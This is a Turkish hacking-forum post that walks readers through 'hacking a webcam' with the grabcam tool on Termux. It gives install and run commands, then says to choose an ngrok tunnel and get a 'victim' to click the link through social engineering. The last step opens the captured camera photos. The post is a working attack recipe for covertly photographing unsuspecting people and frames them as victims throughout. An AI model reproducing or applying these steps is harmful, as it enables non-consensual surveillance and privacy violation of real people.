Neler yeni

Web Kamerası Hacklemek (1 Viewer)

Credits
0
Revealed content

Merhabalar İmha Timi Sayın Üyeleri. Öncelikle Nasılsınız. Bu Değerli Konuyu Sizler için Hazırladım. Daha Birçok Bilgilendirici Konuyla Karşı Karşıya Kalmak Ümidiyle. Herbirinizi seviyorum. Sizlerle Gurur Duymaktayım. Bu Platform Türkiyenin 1 Numaralı Platformu olacak. Değerli Yorumlarınız birde Beğenileriniz için Teşekkürlerimi Sunarım.
1.png
Konumuza Başlıyoruz.
1.png
Öncelikle Android Telefonumuzun Google Play Store kısmından Termuxu indirmemiz gerekir. Bu Yolla Bir Web Kamerası nasıl Hacklenir sizlere bunu Göstereceğimdir. Termuxu indirdikten sonra Terminalimize şu kodları Girelim.
1.png
Kod:
apt update -y
apt upgrade -y
pkg install python -y
pkg install python2 -y
pkg install wget -y
pip install lolcat
pkg install git -y
git clone https://github.com/noob-hackers/grabcam
clear
ls
cd grabcam
chmod +x grabcam.sh
bash grabcam.sh

2.png

[COLOR=rgb(41, 105, 176) Olarak ayarlayın. Bundan sonrada Tünel açma Seçeneğine sahip Olacaksınız. [/COLOR]

imt2.jpeg

1.png
2. Maddeyi yani ngrok Kısmını Seçelim. Gelen Bağlantıyı Kurbanımıza Atalım. Bu Bağlantıyı tabii Sosyal Mühendislik yaparak yani ikna ederek Kurbanımıza yedirmeliyiz.

1.png
Tüm işlemleri Yaptıktan sonra Kurbanımız Bağlantıya tıkladıktan sonra Kurbanımızın Resmini Görmek istiyorsak Aşağıdaki işlemler yapılır.

2.png

Kod:
ls
termux-open

Bu İşlemler yapıldıktan sonra Karşınıza bir .png uzantılı Dosya çıkacaktır. Size Bu yolla bir Web Kamerası nasıl hacklenir bu yolu Gösterdim Sizlere. Saygılarımı Sunarım........

Ekli dosyalar

• 1.png
    1.png
    12.8 KB · Görüntüleme: 17
  • 1.png
    1.png
    12.8 KB · Görüntüleme: 17
Moderatör tarafında düzenlendi:

Bu konuyu görüntüleyen kullanıcılar